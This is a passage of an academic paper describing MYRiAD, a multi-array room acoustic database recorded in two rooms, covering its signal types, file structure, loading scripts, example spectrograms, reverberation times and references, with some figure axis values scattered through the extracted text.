+ the AIL, the microphone configurations M1 and M2
801
+ located in position P2 as shown in Fig. 6 were used.
802
+ The curtains on the sides of the room in the AIL were
803
+ closed during the recordings of CP1, CP2, and CP3,
804
+ and open during CP4, CP5, and CP6. Photos from the
805
+ cocktail parties in the SAL and AIL are shown in Fig.
806
+ 8.
807
+
808
+ Dietzen et al.
809
+ Page 9 of 15
810
+ Table 3: Signals recorded and computed in the database.
811
+ Signal
812
+ Type
813
+ Quantity
814
+ Duration (s)
815
+ Source
816
+ Acquisition
817
+ Speakers1
818
+ Label
819
+ Male speaker
820
+ Speech
821
+ 3
822
+ 30–37
823
+ [33]
824
+ playback + record
825
+ Lsub
826
+ M[i], [i] ∈ {1, 2, 3}
827
+ Female speaker
828
+ Speech
829
+ 3
830
+ 30–37
831
+ [33]
832
+ playback + record
833
+ Lsub
834
+ F[i], [i] ∈ {1, 2, 3}
835
+ Stationary noise
836
+ Noise
837
+ 1
838
+ 35
839
+ generated
840
+ playback + record
841
+ Lsub
842
+ SN
843
+ Cocktail party
844
+ Noise
845
+ 6
846
+ 600
847
+ party guests
848
+ party + record
849
+ none
850
+ CP[i], [i] ∈ {1, 2, . . . , 6}
851
+ Drums
852
+ Music
853
+ 1
854
+ 41
855
+ [34]
856
+ playback + record
857
+ Lsub
858
+ DR
859
+ Piano
860
+ Music
861
+ 1
862
+ 35
863
+ [35]
864
+ playback + record
865
+ Lsub
866
+ PI
867
+ Sine sweep2
868
+ Meas.
869
+ 2
870
+ 15
871
+ generated
872
+ playback + record
873
+ all
874
+ RIR
875
+ RIR
876
+ 1
877
+ 2–3
878
+ sine sweeps
879
+ computed [32]
880
+ all
881
+ RIR
882
+ 1 The subset Lsub includes all speakers in SAL and SL1 to SL8 in the AIL, cf. Fig. 5 and Table 2.
883
+ 2 The raw sine sweeps are not included in the database and hence do not have a label.
884
+ AIL
885
+ Figure 7: A combination of the microphone con-
886
+ figurations M1 and M2 as used at the AIL.
887
+ 6 Using the database
888
+ In this section, we elaborate on the file path struc-
889
+ ture of the database in Sec. 6.1 as well as the code
890
+ provided for loading audio signals and retrieving loud-
891
+ speaker and microphone coordinates in Sec. 6.2, and
892
+ present some examples of audio signals in Sec. 6.3 and
893
+ reverberation time estimates in Sec. 6.4.
894
+ 6.1 File path structure
895
+ Table 4 provides an overview of the directory tree for
896
+ the database. Audio files are located in the root di-
897
+ rectory /audio/, with loudspeaker source signals in
898
+ the subfolder SRC/ and recorded microphone signals
899
+ in the subfolders SAL/ and AIL/. The recorded mi-
900
+ crophone signals are further organized by loudspeaker
901
+ (except for cocktail party recordings) and microphone
902
+ configuration placement (in the AIL). The file names
903
+ encode both the microphone and signal type. Note
904
+ that not all folders contain all possible combina-
905
+ tions of microphones and signals. For instance, the
906
+ folder /audio/SAL/CP/ contains only files of signal
907
+ Figure 8: Cocktail party recordings at the SAL
908
+ and the AIL.
909
+ type CP∗, and the folders in /audio/AIL/SU∗/ and
910
+ /audio/AIL/ST∗/ only contain files of signal type RIR,
911
+ cf. Sec. 5.2.
912
+
913
+ SAL
914
+ SALDietzen et al.
915
+ Page 10 of 15
916
+ Table 4: File path structure of the database.
917
+ root
918
+ signal type1
919
+ source signal path
920
+ /audio/
921
+ SRC/
922
+ [s].wav
923
+ root
924
+ room
925
+ speaker2 or CP
926
+ config. placement3
927
+ microphone2 and signal type1
928
+ microphone signal path
929
+ /audio/
930
+ SAL/
931
+ S[a] [d]/
932
+ [m] [s].wav
933
+ CP/
934
+ AIL/
935
+ S[l][i]/
936
+ P1/
937
+ P2/
938
+ CP/
939
+ P2/
940
+ root
941
+ room
942
+ coordinate file path
943
+ coord/
944
+ SAL.csv
945
+ AIL.csv
946
+ root
947
+ language
948
+ script or function4
949
+ code file path
950
+ /tools/
951
+ MATLAB/
952
+ [f].m
953
+ Python/
954
+ [f].py
955
+ 1 The signal label [s] takes the forms as defined in Table 3.
956
+ 2 The speaker labels S[a] [d] and S[l][i] and the microphone label [m] take the forms as defined in Table 2.
957
+ 3 P1 and P2 refer to the microphone configuration placements at the AIL as shown in Fig. 6.
958
+ 4 The script or function names [f] take the forms as defined in Table 5.
959
+ Table 5: Scripts facilitating the use of the database.
960
+ script or function name
961
+ description (detailed help can be found in the header)
962
+ load audio data
963
+ example script loading audio recordings and calling load coordinates()
964
+ load coordinates()
965
+ function loading and optionally plotting microphone and loudspeaker coordinates
966
+ The folder /coord/ contains files with coordinates
967
+ of all speakers and microphones in both the SAL and
968
+ the AIL, and the folder /tools/ contain MATLAB and
969
+ Python scripts for accessing audio data and coordi-
970
+ nates, cf. Sec.6.2.
971
+ 6.2 Creating Microphone Signals and Retrieving
972
+ Coordinates
973
+ The database comes with MATLAB and Python
974
+ scripts intended to facilitate retrieving loudspeaker
975
+ and microphone coordinates and generating signals,
976
+ as listed in Table 5.
977
+ The script load audio data is an example script
978
+ demonstrating how a .wav-file can be loaded given a
979
+ list of loudspeaker, microphone, and signal labels pro-
980
+ vided by the user. This script also calls the function
981
+ load coordinates(), which reads corresponding coordi-
982
+ nates from SAL.csv or AIL.csv (cf. Table 4) and op-
983
+ tionally visualizes them.
984
+ 6.3 Examples of the audio signals
985
+ In this section, we take a glimpse into the database
986
+ by observing some of the signals in both the SAL and
987
+ the AIL, which will also make evident the different
988
+ acoustics of the spaces.
989
+ Fig. 9 displays the waveform (top of each sub-figure)
990
+ and corresponding spectrogram (bottom of each sub-
991
+ figure) for a number of signals related to the SAL.
992
+ The colourmap in the spectrograms corresponds to the
993
+ squared magnitude of the short-time Fourier transform
994
+ coefficients and is plotted in dB. Fig. 9 (a) is the first 10
995
+ seconds of the source signal corresponding to a female
996
+ speaker, F1 (cf. Table 3). Fig. 9 (b) is a computed RIR
997
+ in the SAL from the loudspeaker S0 1 to microphone
998
+ BTELF (cf. Fig. 3), where the reverberation time is
999
+ seen to be quite long and highly frequency-dependent.
1000
+ Fig. 9 (c) shows the recorded signal of the source signal
1001
+ F1 (from Fig. 9 (a)) in the microphone BTELF after
1002
+ being played through the loudspeaker S0 1. The ef-
1003
+ fect of the reverberation is evident as the spectrogram
1004
+ shows how the source signal has now been distorted
1005
+
1006
+ Dietzen et al.
1007
+ Page 11 of 15
1008
+ Page 1 of 1
1009
+ 0
1010
+ 2
1011
+ 4
1012
+ 6
1013
+ 8
1014
+ 10
1015
+ −0.4
1016
+ −0.20
1017
+ 0.2
1018
+ 0.4
1019
+ Amplitude
1020
+ (a)
1021
+ 0
1022
+ 2
1023
+ 4
1024
+ 6
1025
+ 8
1026
+ 10
1027
+ 0
1028
+ 5
1029
+ 10
1030
+ 15
1031
+ 20
1032
+ Time (s)
1033
+ Frequency (kHz)
1034
+ 0
1035
+ 1
1036
+ 2
1037
+ 3
1038
+ -0.1
1039
+ -0.05
1040
+ 0
1041
+ 0.05
1042
+ 0.1
1043
+ (b)
1044
+ 0
1045
+ 1
1046
+ 2
1047
+ 3
1048
+ 0
1049
+ 5
1050
+ 10
1051
+ 15
1052
+ 20
1053
+ Time(s)
1054
+ −80
1055
+ −60
1056
+ −40
1057
+ −20
1058
+ 0
1059
+ 20
1060
+ dB
1061
+ 0
1062
+ 2
1063
+ 4
1064
+ 6
1065
+ 8
1066
+ 10
1067
+ −0.2
1068
+ 0
1069
+ 0.2
1070
+ Amplitude
1071
+ (c)
1072
+ 0
1073
+ 2
1074
+ 4
1075
+ 6
1076
+ 8
1077
+ 10
1078
+ 0
1079
+ 5
1080
+ 10
1081
+ 15
1082
+ 20
1083
+ Time (s)
1084
+ Frequency (kHz)
1085
+ 0
1086
+ 2
1087
+ 4
1088
+ 6
1089
+ 8
1090
+ 10
1091
+ −0.2
1092
+ 0
1093
+ 0.2
1094
+ (d)
1095
+ 0
1096
+ 2
1097
+ 4
1098
+ 6
1099
+ 8
1100
+ 10
1101
+ 0
1102
+ 5
1103
+ 10
1104
+ 15
1105
+ 20
1106
+ Time (s)
1107
+ 0
1108
+ 2
1109
+ 4
1110
+ 6
1111
+ 8
1112
+ 10
1113
+ −0.2
1114
+ 0
1115
+ 0.2
1116
+ (e)
1117
+ 0
1118
+ 2
1119
+ 4
1120
+ 6
1121
+ 8
1122
+ 10
1123
+ 0
1124
+ 5
1125
+ 10
1126
+ 15
1127
+ 20
1128
+ Time (s)
1129
+ −80
1130
+ −60
1131
+ −40
1132
+ −20
1133
+ 0
1134
+ 20
1135
+ dB
1136
+ Figure 9: Waveform and corresponding spectrogram of signals related to the SAL recordings. (a) First 10 sec-
1137
+ onds of the source signal corresponding to a female speaker, F1 (cf. Table 3), (b) computed RIR from the loud-
1138
+ speaker S0 1 to microphone BTELF (cf. Fig. 3), (c) recorded microphone BTELF signal after the signal from
1139
+ (a) was played through the loudspeaker S0 1, (d) simulated signal from the convolution of (a) and (b), (e) error
1140
+ between signals (c) and (d).
1141
+ in both time and frequency. Fig. 9 (d) is the result
1142
+ of a convolution between the RIR from loudspeaker
1143
+ S0 1 to microphone BTELF (Fig. 9 (b)) and the F1
1144
+ source signal (Fig. 9 (a)). This signal is representative
1145
+ of how the recorded signal from Fig. 9 (c) would typ-
1146
+ ically be simulated. As should be expected, Fig. 9 (c)
1147
+ and Fig. 9 (d), appear quite similar. However, Fig. 9 (e)
1148
+ illustrates the difference (error) between the waveform
1149
+ plots in Fig. 9 (c) and Fig. 9 (d), with the correspond-
1150
+ ing spectrogram of this error, demonstrating that the
1151
+ simulated signal and recorded signal are not identical.
1152
+ Fig. 10 displays signals from the AIL in a similar
1153
+ manner to that of Fig. 9. The first 10 seconds of the
1154
+ same source signal, F1 (cf. Table 3) is observed (Fig.
1155
+ 10 (a)). Fig. 10 (b) is a computed RIR in the AIL from
1156
+ the loudspeaker SL5 1 to microphone BTELF (cf. Fig.
1157
+ 3), where it can be observed that the reverberation
1158
+ time is significantly shorter as compared to the SAL
1159
+ and more uniform across frequency. Fig. 10 (c) shows
1160
+ the recorded signal of the source signal F1 (from Fig.
1161
+ 10 (a)) in the microphone BTELF after being played
1162
+ through the loudspeaker SL5 1. Fig. 10 (d) is the result
1163
+ of a convolution between the RIR from loudspeaker
1164
+ SL5 1 to microphone BTELF (Fig. 10 (b)) and the F1
1165
+ source signal (Fig. 10 (a)). Fig. 10 (e) is the differ-
1166
+ ence (error) between the waveform plots in Fig. 10 (c)
1167
+ and Fig. 10 (d). It can once again be observed that
1168
+ although the simulated and recorded signals are quite
1169
+ similar, they are not identical.
1170
+ Figure 11 depicts the waveform and corresponding
1171
+ spectrogram from a 15 s sample of the cocktail party
1172
+ noise. The left of Fig. 11 is the signal CP2 (cf. Table 3)
1173
+ for microphone XM2 in the SAL and the right of Fig.
1174
+ 11 is the signal CP5 from XM2 in the AIL. The non-
1175
+ stationary behaviour of this type of noise over time
1176
+ and frequency is quite evident.
1177
+ 6.4 Reverberation times
1178
+ The reverberation time RT60 for the two rooms SAL
1179
+ and AIL is estimated at full bandwidth as well as in
1180
+
1181
+ Dietzen et al.
1182
+ Page 12 of 15
1183
+ Page 1 of 1
1184
+ 0
1185
+ 2
1186
+ 4
1187
+ 6
1188
+ 8
1189
+ 10
1190
+ −0.4
1191
+ −0.20
1192
+ 0.2
1193
+ 0.4
1194
+ Amplitude
1195
+ (a)
1196
+ 0
1197
+ 2
1198
+ 4
1199
+ 6
1200
+ 8
1201
+ 10
1202
+ 0
1203
+ 5
1204
+ 10
1205
+ 15
1206
+ 20
1207
+ Time (s)
1208
+ Frequency (kHz)
1209
+ 0
1210
+ 1
1211
+ 2
1212
+ 3
1213
+ -0.1
1214
+ -0.05
1215
+ 0
1216
+ 0.05
1217
+ 0.1
1218
+ (b)
1219
+ 0
1220
+ 1
1221
+ 2
1222
+ 3
1223
+ 0
1224
+ 5
1225
+ 10
1226
+ 15
1227
+ 20
1228
+ Time(s)
1229
+ −80
1230
+ −60
1231
+ −40
1232
+ −20
1233
+ 0
1234
+ 20
1235
+ dB
1236
+ 0
1237
+ 2
1238
+ 4
1239
+ 6
1240
+ 8
1241
+ 10
1242
+ -0.1
1243
+ -0.05
1244
+ 0
1245
+ 0.05
1246
+ 0.1
1247
+ Amplitude
1248
+ (c)
1249
+ 0
1250
+ 2
1251
+ 4
1252
+ 6
1253
+ 8
1254
+ 10
1255
+ 0
1256
+ 5
1257
+ 10
1258
+ 15
1259
+ 20
1260
+ Time (s)
1261
+ Frequency (kHz)
1262
+ 0
1263
+ 2
1264
+ 4
1265
+ 6
1266
+ 8
1267
+ 10
1268
+ -0.1
1269
+ -0.05
1270
+ 0
1271
+ 0.05
1272
+ 0.1
1273
+ (d)
1274
+ 0
1275
+ 2
1276
+ 4
1277
+ 6
1278
+ 8
1279
+ 10
1280
+ 0
1281
+ 5
1282
+ 10
1283
+ 15
1284
+ 20
1285
+ Time (s)
1286
+ 0
1287
+ 2
1288
+ 4
1289
+ 6
1290
+ 8
1291
+ 10
1292
+ -0.1
1293
+ -0.05
1294
+ 0
1295
+ 0.05
1296
+ 0.1
1297
+ (e)
1298
+ 0
1299
+ 2
1300
+ 4
1301
+ 6
1302
+ 8
1303
+ 10
1304
+ 0
1305
+ 5
1306
+ 10
1307
+ 15
1308
+ 20
1309
+ Time (s)
1310
+ −80
1311
+ −60
1312
+ −40
1313
+ −20
1314
+ 0
1315
+ 20
1316
+ dB
1317
+ Figure 10: Waveform and corresponding spectrogram of signals related to the AIL recordings. (a) First 10 sec-
1318
+ onds of the source signal corresponding to a female speaker, F1 (cf. Table 3), (b) computed RIR from the loud-
1319
+ speaker SL5 1 to microphone BTELF (cf. Fig. 3), (c) recorded microphone BTELF signal after the signal from
1320
+ (a) was played through the loudspeaker SL5 1, (d) simulated signal from the convolution of (a) and (b), (e) error
1321
+ between signals (c) and (d).
1322
+ different octave bands. The estimate is obtained from
1323
+ the slope of a line fitted on the decay curves of the RIRs
1324
+ according to the ISO standard [37] and using the code
1325
+ in [38]. Here, the line was fitted in the dynamic range
1326
+ between −5 dB and −25 dB of the decay curve. A plot
1327
+ of the estimated reverberation times is shown in Fig.
1328
+ 12. As can be seen, the full-band reverberation time is
1329
+ significantly higher in the SAL with 2.1 s as compared
1330
+ to the AIL with 0.5 s. We further note that RT60 in
1331
+ the SAL is largest between 1 and 2 kHz, while it is less
1332
+ dependent on frequency in the AIL.
1333
+ 7 Conclusion
1334
+ In this paper, a database of acoustic recordings, re-
1335
+ ferred to as the Multi-arraY Room Acoustic Database
1336
+ (MYRiAD), has been presented, which facilitates the
1337
+ recreation of noisy and reverberant microphone sig-
1338
+ nals for the purpose of evaluating audio signal process-
1339
+ ing algorithms. Recordings were made in two differ-
1340
+ ent rooms, the SONORA audio laboratory (SAL) and
1341
+ the Alamire Interactive Laboratory (AIL), with signif-
1342
+ icantly different reverberation times of 2.1 s and 0.5 s,
1343
+ respectively. In the SAL, a microphone configuration,
1344
+ M1, was used, which consists of in-ear dummy head
1345
+ microphones, microphones on behind-the-ear pieces
1346
+ placed on the dummy head, and external microphones
1347
+ (i.e. other microphones in the room). In the AIL,
1348
+ recordings were made in two different positions within
1349
+ the room using the microphone configuration M1 along
1350
+ with a second microphone configuration, M2, which
1351
+ consists of two concentric circular microphone arrays.
1352
+ In the SAL, 10 movable loudspeakers were used for
1353
+ sound generation, while in the AIL, a built-in array of
1354
+ 24 loudspeakers was used. The database contains room
1355
+ impulse responses, speech, music and stationary noise
1356
+ signals, as well as recordings of a live cocktail party
1357
+ held in each room. MATLAB and Python scripts are
1358
+ included for accessing audio data and coordinates. The
1359
+ database is publicly available at [1].
1360
+
1361
+ Dietzen et al.
1362
+ Page 13 of 15
1363
+ Page 1 of 1
1364
+ 0
1365
+ 2
1366
+ 4
1367
+ 6
1368
+ 8
1369
+ 10
1370
+ 12
1371
+ 14
1372
+ −0.4
1373
+ −0.2
1374
+ 0
1375
+ 0.2
1376
+ 0.4
1377
+ Amplitude
1378
+ 0
1379
+ 2
1380
+ 4
1381
+ 6
1382
+ 8
1383
+ 10
1384
+ 12
1385
+ 14
1386
+ 0
1387
+ 5
1388
+ 10
1389
+ 15
1390
+ 20
1391
+ Time (s)
1392
+ Frequency (kHz)
1393
+ 0
1394
+ 2
1395
+ 4
1396
+ 6
1397
+ 8
1398
+ 10
1399
+ 12
1400
+ 14
1401
+ -0.1
1402
+ -0.05
1403
+ 0
1404
+ 0.05
1405
+ 0.1
1406
+ 0
1407
+ 2
1408
+ 4
1409
+ 6
1410
+ 8
1411
+ 10
1412
+ 12
1413
+ 14
1414
+ 0
1415
+ 5
1416
+ 10
1417
+ 15
1418
+ 20
1419
+ Time (s)
1420
+ −80
1421
+ −60
1422
+ −40
1423
+ −20
1424
+ 0
1425
+ 20
1426
+ dB
1427
+ Figure 11: Waveform and corresponding spectrogram for a 15 s sample of the cocktail party noise. (Left) Signal
1428
+ CP2 for XM2 in the SAL. (Right) Signal CP5 for XM2 in the AIL.
1429
+ Dietzen et al.
1430
+ Page 15 of 15
1431
+ full bandwitdh
1432
+ 250
1433
+ 500
1434
+ 1000
1435
+ 2000
1436
+ 4000
1437
+ 8000
1438
+ 0
1439
+ 1
1440
+ 2
1441
+ Octave Band Center Frequency (Hz)
1442
+ Reverberation Time RT60 (s)
1443
+ SAL
1444
+ AIL
1445
+ Figure 12: Reverberation time RT60 for the two rooms SAL and AIL at full bandwidth and in di↵erent octave
1446
+ bands. The error bars indicate the standard deviation of the estimate across all possible loudspeaker-microphone
1447
+ combinations.
1448
+ Figure 12: Reverberation time RT60 for the two rooms SAL and AIL at full bandwidth and in different octave
1449
+ bands. The error bars indicate the standard deviation of the estimate across all possible loudspeaker-microphone
1450
+ combinations.
1451
+ Abbreviations
1452
+ MYRiAD – Multi-ArraY Room Acoustic Database.
1453
+ RIR – room impulse response. DH – dummy head.
1454
+ BTE – behind-the-ear. XM – external microphone.
1455
+ CMA – circular microphone array. SAL – SONORA
1456
+ Audio Laboratory. AIL – Alamire Interactive Labora-
1457
+ tory. CSTR – Centre for Speech Technology Research.
1458
+ VCTK – Voice Cloning Toolkit. EBU SQAM – Euro-
1459
+ pean Broadcast Union Sound Quality Assessment Ma-
1460
+ terial.
1461
+ Declarations
1462
+ Availability of data and materials
1463
+ The database is publicly available at [1].
1464
+ Competing interests
1465
+ The authors declare that they have no competing interests.
1466
+ Funding
1467
+ This research work was carried out at the ESAT Laboratory of KU Leuven,
1468
+ in the frame of KU Leuven internal funds C24/16/019 ”Distributed Digital
1469
+ Signal Processing for Ad-hoc Wireless Local Area Audio Networking” and
1470
+ VES/19/004, and was funded by the Research Foundation Flanders
1471
+ (FWO-Vlaanderen) through the Large-scale research infrastructure ”The
1472
+ Library of Voices – Unlocking the Alamire Foundation’s Music Heritage
1473
+ Resources Collection through Visual and Sound Technology” (I013218N),
1474
+ the SBO Project ”The sound of music – Innovative research and
1475
+ valorization of plainchant through digital technology” (S005319N), and the
1476
+ Postdoctoral Research Grant 12X6719N. The research leading to these
1477
+ results has received funding from the European Research Council under the
1478
+ European Union’s Horizon 2020 research and innovation program / ERC
1479
+ Consolidator Grant: SONORA (no. 773268). This paper reflects only the
1480
+ authors’ views and the Union is not liable for any use that may be made of
1481
+ the contained information. The BTE shells used for the recordings were
1482
+ provided by Cochlear Technology Centre Belgium in the context of a
1483
+ project funded by the IWT (project 110722).
1484
+ Author’s contributions
1485
+ TD, RA, MT, and TVW jointly developed the recording setup and
1486
+ methodology. TD, RA, and MT acquired and post-processed the audio
1487
+
1488
+ Dietzen et al.
1489
+ Page 14 of 15
1490
+ data. TD and RA compiled the database and drafted the manuscript. All
1491
+ authors read and reviewed the final manuscript.
1492
+ Acknowledgements
1493
+ We would like to thank the European Broadcasting Union for permission to
1494
+ use track 60 (Schubert) from the EBU SQUAM recordings [35]. We would
1495
+ like to thank Rudi Knoops and Jo Santy for coordinating the logistics for
1496
+ recording at the AIL, as well as Elisa Tengan Pires de Souza, Taewoong
1497
+ Lee, and Jesper Brunnstr¨om for assistance with the recordings and
1498
+ preparation of the database. Finally, we would like to thank everyone who
1499
+ participated in the cocktail party noise recordings.
1500
+ Authors’ information
1501
+ MT contributed to this work while being with ESAT-STADIUS, KU
1502
+ Leuven, Leuven, Belgium.
1503
+ Author details
1504
+ 1Dept. of Electrical Engineering (ESAT), STADIUS Center for Dynamical
1505
+ Systems, Signal Processing and Data Analytics, KU Leuven, Leuven,
1506
+ Belgium.
1507
+ 2Microsoft, Munich, Germany.
1508
+ References
1509
+ 1. Dietzen, T., Ali, R., Taseska, M., van Waterschoot, T.: Data
1510
+ Repository for MYRiAD: A Multi-Array Room Acoustic Database.
1511
+ doi:10.5281/zenodo.7389996. https://zenodo.org/record/7389996
1512
+ 2. Loizou, P.C.: Speech Enhancement: Theory and Practice. CRC press,
1513
+ Boca Raton, Florida, USA (2007)
1514
+ 3. Gannot, S., Cohen, I.: Adaptive Beamforming and Postfiltering.
1515
+ Springer Handbook of Speech Processing, pp. 945–978. Springer, New
1516
+ York City, New York State, USA (2007)
1517
+ 4. Doclo, S., Gannot, S., Moonen, M., Spriet, A.: Acoustic beamforming
1518
+ for hearing aid applications. In: Handbook on Array Processing and
1519
+ Sensor Networks, pp. 269–302. Wiley, Hoboken, New Jersey, USA
1520
+ (2010)
1521
+ 5. Naylor, P.A., Gaubitch, N.D.: Speech Dereverberation. Springer, New
1522
+ York City, New York State, USA (2010)
1523
+ 6. Brandstein, M., Ward, D.: Microphone Arrays: Signal Processing
1524
+ Techniques and Applications. Springer, New York City, New York
1525
+ State, USA (2013)
1526
+ 7. Kinoshita, K., Delcroix, M., Gannot, S., Habets, E.A.P.,
1527
+ Haeb-Umbach, R., Kellermann, W., Leutnant, V., Maas, R., Nakatani,
1528
+ T., Raj, B., Sehr, A., Yoshioka, T.: A summary of the REVERB
1529
+ challenge: state-of-the-art and remaining challenges in reverberant
1530
+ speech processing research. EURASIP J. Adv. Signal Process. 2016(7),
1531
+ 1–19 (2016)
1532
+ 8. Gannot, S., Vincent, E., Markovich-Golan, S., Ozerov, A.: A
1533
+ consolidated perspective on multimicrophone speech enhancement and
1534
+ source separation. IEEE/ACM Trans. Audio, Speech, Lang. Process.
1535
+ 25(4), 692–730 (2017)
1536
+ 9. Vincent, E., Virtanen, T., Gannot, S.: Audio Source Separation and
1537
+ Speech Enhancement. Wiley, Hoboken, New Jersey, USA (2018)
1538
+ 10. Eaton, J., Gaubitch, N.D., Moore, A.H., Naylor, P.A.: Estimation of
1539
+ room acoustic parameters: The ACE challenge. IEEE/ACM Trans.
1540
+ Audio, Speech, Lang. Process. 24(10), 1681–1693 (2016)
1541
+ 11. Sridhar, K., Cutler, R., Saabas, A., Parnamaa, T., Loide, M., Gamper,
1542
+ H., Braun, S., Aichner, R., Srinivasan, S.: ICASSP 2021 acoustic echo
1543
+ cancellation challenge: Datasets, testing framework, and results. In:
1544
+ Proc. 2021 IEEE Int. Conf. Acoust., Speech, Signal Process. (ICASSP
1545
+ 2021), Toronto, Ontario, Canada, pp. 151–155 (2021)
1546
+ 12. van Waterschoot, T., Moonen, M.: Fifty years of acoustic feedback
1547
+ control: State of the art and future challenges. Proc. IEEE 99(2),
1548
+ 288–327 (2010)
1549
+ 13. Evers, C., L¨ollmann, H.W., Mellmann, H., Schmidt, A., Barfuss, H.,
1550
+ Naylor, P.A., Kellermann, W.: The LOCATA challenge: Acoustic
1551
+ source localization and tracking. IEEE/ACM Trans. Audio, Speech,
1552
+ Lang. Process. 28, 1620–1643 (2020)
1553
+ 14. Coleman, P., Jackson, P.J.B., Olik, M., Møller, M., Olsen, M.,
1554
+ Abildgaard Pedersen, J.: Acoustic contrast, planarity and robustness of
1555
+ sound zone methods using a circular loudspeaker array. J. Acoust. Soc.
1556
+ Am. 135(4), 1929–1940 (2014)
1557
+ 15. Betlehem, T., Zhang, W., Poletti, M.A., A., T.D.: Personal sound
1558
+ zones: Delivering interface-free audio to multiple listeners. IEEE Signal
1559
+ Process. Mag. 32(2), 81–91 (2015)
1560
+ 16. Barker, J., Watanabe, S., Vincent, E., Trmal, J.: The fifth ’CHiME’
1561
+ speech separation and recognition challenge: Dataset, task and
1562
+ baselines. In: Proc. Interspeech 2018, Hyderabad, India, pp. 1561–1565
1563
+ (2018)
1564
+ 17. Wen, J.Y.C., Gaubitch, N.D., Habets, E.A.P., Myatt, T., Naylor, P.A.:
1565
+ Evaluation of speech dereverberation algorithms using the MARDY
1566
+ database. In: Proc. 2006 Intl. Workshop Acoust. Echo Noise Control
1567
+ (IWAENC 2006), Paris, France (2006)
1568
+ 18. Jeub, M., Schafer, M., Vary, P.: A binaural room impulse response
1569
+ database for the evaluation of dereverberation algorithms. In: Proc.
1570
+ 2009 16th Int. Conf. Digital Signal Process. (DSP 2009), Santorini,
1571
+ Greece, pp. 1–5 (2009). doi:10.1109/ICDSP.2009.5201259
1572
+ 19. Kayser, H., Ewert, S.D., Anem¨uller, J., Rohdenburg, T., Hohmann, V.,
1573
+ Kollmeier, B.: Database of multichannel in-ear and behind-the-ear
1574
+ head-related and binaural room impulse responses. EURASIP J. Adv.
1575
+ Signal Process. 2009 (2009). doi:10.1155/2009/298605
1576
+ 20. Stewart, R., Sandler, M.: Database of omnidirectional and B-format
1577
+ room impulse responses. In: Proc. 2010 IEEE Int. Conf. Acoust.,
1578
+ Speech, Signal Process. (ICASSP 2010), Dallas, Texas, USA, pp.
1579
+ 165–168 (2010)
1580
+ 21. Nielsen, J.K., Jensen, J.R., Jensen, S.H., Christensen, M.G.: The
1581
+ single- and multichannel audio recordings database (SMARD). In:
1582
+ Proc. 2014 Int. Workshop Acoustic Signal Enhancement (IWAENC
1583
+ 2014), Antibes – Juan les Pins, France, pp. 40–44 (2014)
1584
+ 22. Hadad, E., Heese, F., Vary, P., Gannot, S.: Multichannel audio
1585
+ database in various acoustic environments. In: Proc. 2014 Int.
1586
+ Workshop Acoustic Signal Enhancement (IWAENC 2014), Antibes –
1587
+ Juan les Pins, France, pp. 313–317 (2014)
1588
+ 23. Woods, W.S., Hadad, E., Merks, I., Xu, B., Gannot, S., Zhang, T.: A
1589
+ real-world recording database for ad hoc microphone arrays. In: Proc.
1590
+ 2015 IEEE Workshop Appl. Signal Process. Audio, Acoust. (WASPAA
1591
+ 2015), New Paltz, NY, USA, pp. 2–6 (2015)
1592
+ 24. Sz¨oke, I., Sk´acel, M., Moˇsner, L., Paliesek, J., ˇCernock`y, J.: Building
1593
+ and evaluation of a real room impulse response dataset. IEEE J.
1594
+ Selected Topics Signal Process. 13(4), 863–876 (2019)
1595
+ 25. Di Carlo, D., Tandeitnik, P., Foy, C., Bertin, N., Deleforge, A., Gannot,
1596
+ S.: dEchorate: a calibrated room impulse response dataset for
1597
+ echo-aware signal processing. EURASIP J. Audio, Speech, Music
1598
+ Process. 2021(1), 1–15 (2021)
1599
+ 26. ˇCmejla, J., Kounovsk`y, T., Gannot, S., Koldovsk`y, Z., Tandeitnik, P.:
1600
+ MIRaGe: multichannel database of room impulse responses measured
1601
+ on high-resolution cube-shaped grid. In: 2020 28th European Signal
1602
+ Process. Conf. (EUSIPCO 2020), Amsterdam, The Netherlands, pp.
1603
+ 56–60 (2021)
1604
+ 27. Koyama, S., Nishida, T., Kimura, K., Abe, T., Ueno, N., Brunnstr¨om,
1605
+ J.: MESHRIR: A dataset of room impulse responses on meshed grid
1606
+ points for evaluating sound field analysis and synthesis methods. In:
1607
+ Proc. 2021 IEEE Workshop Appl. Signal Process. Audio, Acoust.
1608
+ (WASPAA 2021), pp. 1–5. IEEE, New Paltz, NY, USA (2021).
1609
+ doi:10.1109/waspaa52581.2021.9632672.
1610
+ https://doi.org/10.1109/waspaa52581.2021.9632672
1611
+ 28. Zhao, S., Zhu, Q., Cheng, E., Burnett, I.S.: A room impulse response
1612
+ database for multizone sound field reproduction. J. Acoust. Soc. Am.
1613
+ 152(4), 2505–2512 (2022)
1614
+ 29. Van Segbroeck, M., Zaid, A., Kutsenko, K., Huerta, C., Nguyen, T.,
1615
+ Luo, X., Hoffmeister, B., Trmal, J., Omologo, M., Maas, R.: DiPCo -
1616
+ dinner party corpus. arXiv preprint arXiv:1909.13447 (2019)
1617
+ 30. Fischer, T., Caversaccio, M., Wimmer, W.: Multichannel acoustic
1618
+ source and image dataset for the cocktail party effect in hearing aid
1619
+ and implant users. Scientific Data 7(440), 1–13 (2020).
1620
+ doi:10.1038/s41597-020-00777-8
1621
+ 31. van Waterschoot, T.: KU Leuven ESAT-STADIUS Audio Research
1622
+ Labs
1623
+ 32. Holters, M., Corbach, T., Z¨olzer, U.: Impulse response measurement
1624
+ techniques and their applicability in the real world. In: Proc. 2009 12th
1625
+ Int. Conf. Digital Audio Effects (DAFx 2009), Como, Italy, pp.
1626
+ 108–112 (2009)
1627
+ 33. Veaux, C., Yamagishi, J., MacDonald, K.: CSTR VCTK Corpus:
1628
+ English Multi-speaker Corpus for CSTR Voice Cloning Toolkit
1629
+ 34. Anti-Everything: Federation Day. Children of a Globalised World
1630
+ (Musical Album). ISRC: TTA101100005, Boatshrimp Records,
1631
+
1632
+ Dietzen et al.
1633
+ Page 15 of 15
1634
+ Port-of-Spain, 2011
1635
+ 35. Union, E.B.: Sound Quality Assessment Material Recordings for
1636
+ Subjective Tests
1637
+ 36. Dokmani´c, I., Parhizkar, R., Ranieri, J., Vetterli, M.: Euclidean
1638
+ distance matrices: Essential theory, algorithms and applications. IEEE
1639
+ Signal Process. Mag. 32, 12–30 (2015)
1640
+ 37. ISO 3382-1:2009: Acoustics — Measurement of Room Acoustic
1641
+ Parameters — Part 1: Performance Spaces, p. 26. International
1642
+ Organization for Standardization, Geneva, Switzerland (2009)
1643
+ 38. Hummersone, C., Pr¨atzlich, T.: GitHub Repository: IoSR Matlab
1644
+ Toolbox. https://github.com/IoSR-Surrey/MatlabToolbox (2017)
1645
+
